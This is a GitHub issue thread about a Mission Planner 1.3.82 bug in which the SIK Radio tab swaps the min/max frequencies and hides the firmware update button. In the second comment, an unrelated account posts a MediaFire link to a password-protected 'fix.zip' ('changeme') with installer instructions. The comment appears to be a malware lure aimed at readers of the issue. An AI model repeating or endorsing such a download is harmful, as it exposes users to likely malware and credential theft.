ArduPilot/MissionPlanner #3395: SIK Radio tab, firmware can not be updated, MIN and MAX frequencies are messed up.

vmax1145, 2024-08-26:
#### Issue details
On SIK radio tab ...with connected SIK radio press load settings button.
After loading settings I see 2 problems
1. Upload firmware button not shows up 
2. Min frequency and max frequency values are messed up. Save settings also not work because MIN >  MAX

This problem appeared in version 1.3.82 , 
When I rolled back to 1.3.81 and it's ok. Min Max on it's places and firmware update work ok.

#### Version
Mission Planner 1.3.82 build 1.3.8979.17128 (Windows MSI)

#### Platform
[  ] All
[  ] AntennaTracker
[* ] Copter
[  ] Plane
[  ] Rover
[  ] Sub

#### Airframe type
Copter Betaflight reversed

#### Hardware type
SIK Radio ( HM-TRP) ,  tested several ones from different manufacturers.

Sorry ... no logs, but screenshot is attached
[image]

luozhengdong, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Ryanf55, 2025-04-17:
Still affected on master.